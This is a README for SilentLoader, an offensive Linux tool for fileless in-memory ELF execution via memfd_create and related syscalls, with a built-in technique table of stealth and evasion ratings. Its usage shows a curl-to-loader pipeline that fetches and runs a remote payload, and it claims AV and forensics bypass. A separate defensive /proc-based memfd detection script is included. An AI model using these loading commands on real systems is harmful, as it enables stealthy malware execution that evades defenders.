SilentLoader -- Linux In-Memory ELF Loader

  +=====================================================+
  |    SilentLoader -- Linux In-Memory ELF Loader       |
  |  memfd_create . /proc/self/mem . shm_open . ptrace  |
  |    Author: mazen91111 (parasite911)                  |
  +=====================================================+

Execute ELF binaries directly from memory without ever touching disk. Uses memfd_create(2), /proc/self/mem, shm_open, and userland exec techniques. Bash loader script + Python analysis framework.


Loading Techniques

| # | Technique | MITRE ID | Stealth | Disk Touch | Kernel |
|---|-----------|----------|---------|------------|--------|
| 1 | memfd_create + fexecve | T1620 | 9/10 | NO | >= 3.17 |
| 2 | memfd_create + execveat | T1620 | 10/10 | NO | >= 3.19 |
| 3 | /proc/self/mem Direct Write | T1055.009 | 8/10 | NO | >= 2.6 |
| 4 | shm_open + mmap Execution | T1055.001 | 7/10 | NO | >= 2.6 |
| 5 | process_vm_writev Remote | T1055.009 | 8/10 | NO | >= 3.2 |
| 6 | ELF Userland Exec (ul_exec) | T1620 | 10/10 | NO | >= 2.6 |

Installation

```bash
git clone https://github.com/mazen91111/SilentLoader.git
cd SilentLoader
pip install -r requirements.txt
chmod +x memfd_loader.sh
```

Usage

Python Framework

```bash
# Full analysis + simulation
python3 silent_loader.py --demo

# Show loading techniques
python3 silent_loader.py --techniques

# Run injection simulation
python3 silent_loader.py --simulate

# Analyze a real ELF binary
python3 silent_loader.py --analyze /usr/bin/ls
```

Bash Loader

```bash
# Demo mode (show techniques)
./memfd_loader.sh --demo

# Load ELF from file into memory
./memfd_loader.sh ./payload

# Fully fileless -- pipe from network
curl -s http://server/payload | ./memfd_loader.sh -
```

Example Output

  [*] SilentLoader -- Analyzing in-memory loading techniques...

  [ LOADING TECHNIQUES ]

  | #1  memfd_create + fexecve
  | MITRE: T1620  |  Stealth: [||||||||||] 9/10
  | Disk Touch: NO -- MEMORY ONLY  |  Kernel: >= 3.17
  | Code:
  |   int fd = syscall(SYS_memfd_create, "", MFD_CLOEXEC);
  |   write(fd, elf_buf, elf_size);
  |   fexecve(fd, argv, envp);

  [ IN-MEMORY LOADING SIMULATION ]

  | [OK] memfd_create + fexecve
  |   FD Path   : /proc/self/fd/3 -> /memfd: (deleted)
  |   Mem Addr   : 0x7f4a2c8e1b3d
  |   Risk       : LOW
  |   Artifacts  :
  |     - /proc/<pid>/fd/ shows memfd: link
  |     - /proc/<pid>/maps shows anon_inode:[memfd]

  [ DETECTION ANALYSIS ]
  x File-based AV/EDR: BYPASSED -- no file on disk to scan
  x Disk forensics:    BYPASSED -- zero disk artifacts
  + seccomp-bpf:       EFFECTIVE -- can block memfd_create/execveat
  + eBPF tracing:      EFFECTIVE -- syscall-level visibility
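The artifacts and detection notes above translate directly into a host-side hunt. The following is an added example, not SilentLoader's own code: it scores each process from the /proc/<pid>/exe and /proc/<pid>/fd symlink targets and the path column of /proc/<pid>/maps, assuming the kernel renders a memfd as "/memfd:<name> (deleted)" (the "anon_inode:[memfd]" spelling shown above is accepted as well); the sample inputs used to check it are constructed.

```python
import os
import re

# A memfd shows up as the symlink target "/memfd:<name> (deleted)" under /proc/<pid>/fd
# and /proc/<pid>/exe and in the path column of /proc/<pid>/maps; the "anon_inode:[memfd]"
# spelling from the output above is accepted as well.
MEMFD_TARGET = re.compile(r"^/memfd:.*\(deleted\)$")
MAPS_LINE = re.compile(r"^(?P<range>\S+) (?P<perms>\S{4}) \S+ \S+ \S+\s*(?P<path>.*)$")

def is_memfd_target(target):
    return bool(MEMFD_TARGET.match(target)) or "anon_inode:[memfd]" in target

def executable_memfd_maps(maps_text):
    """Return 'range perms path' for every executable, memfd-backed mapping."""
    hits = []
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if m and "x" in m["perms"] and is_memfd_target(m["path"]):
            hits.append(f"{m['range']} {m['perms']} {m['path']}")
    return hits

def assess(exe_target, fd_targets, maps_text):
    """Combine the three /proc artifacts into one verdict for a process."""
    memfd_fds = sorted(fd for fd, t in fd_targets.items() if is_memfd_target(t))
    exec_maps = executable_memfd_maps(maps_text)
    exe_is_memfd = is_memfd_target(exe_target)
    # Running *from* a memfd (fexecve/execveat) is the strongest signal, an executable
    # memfd mapping is next, and a lone memfd fd is common in benign software
    # (JIT runtimes, graphics buffers), so it only rates LOW.
    severity = ("HIGH" if exe_is_memfd else "MEDIUM" if exec_maps
                else "LOW" if memfd_fds else "NONE")
    return {"severity": severity, "exe_is_memfd": exe_is_memfd,
            "memfd_fds": memfd_fds, "exec_maps": exec_maps}

def scan_pid(pid):
    """Read a live process's artifacts; None if it exited or is unreadable."""
    proc = f"/proc/{pid}"
    try:
        exe = os.readlink(f"{proc}/exe")
        fds = {int(n): os.readlink(f"{proc}/fd/{n}") for n in os.listdir(f"{proc}/fd")}
        with open(f"{proc}/maps") as f:
            return assess(exe, fds, f.read())
    except OSError:
        return None

if __name__ == "__main__":  # walk every pid; needs root to read other users' processes
    for name in filter(str.isdigit, os.listdir("/proc")):
        r = scan_pid(int(name))
        if r and r["severity"] != "NONE":
            print(name, r["severity"], r["memfd_fds"], r["exec_maps"][:2])
```

This is a point-in-time snapshot, so a loader that runs and exits between scans is missed; the syscall-level eBPF tracing of memfd_create/execveat noted above is the complementary control for that gap.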

Key Concepts

  • memfd_create = kernel syscall that creates anonymous file in memory (no disk path)
  • execveat + AT_EMPTY_PATH = execute from fd without needing /proc mounted
  • /proc/self/mem = direct access to process memory for in-place code modification
  • Userland Exec = parse ELF manually, mmap segments, jump to entry -- no execve syscall at all
  • shm_open = POSIX shared memory in tmpfs (RAM-backed), unlink immediately after mmap

Author

Mazen Obed -- @mazen91111 Linux Internals | Fileless Execution | In-Memory Loading


Disclaimer

For authorized security research ONLY. Understanding in-memory loading is essential for detecting fileless malware.


License

MIT License
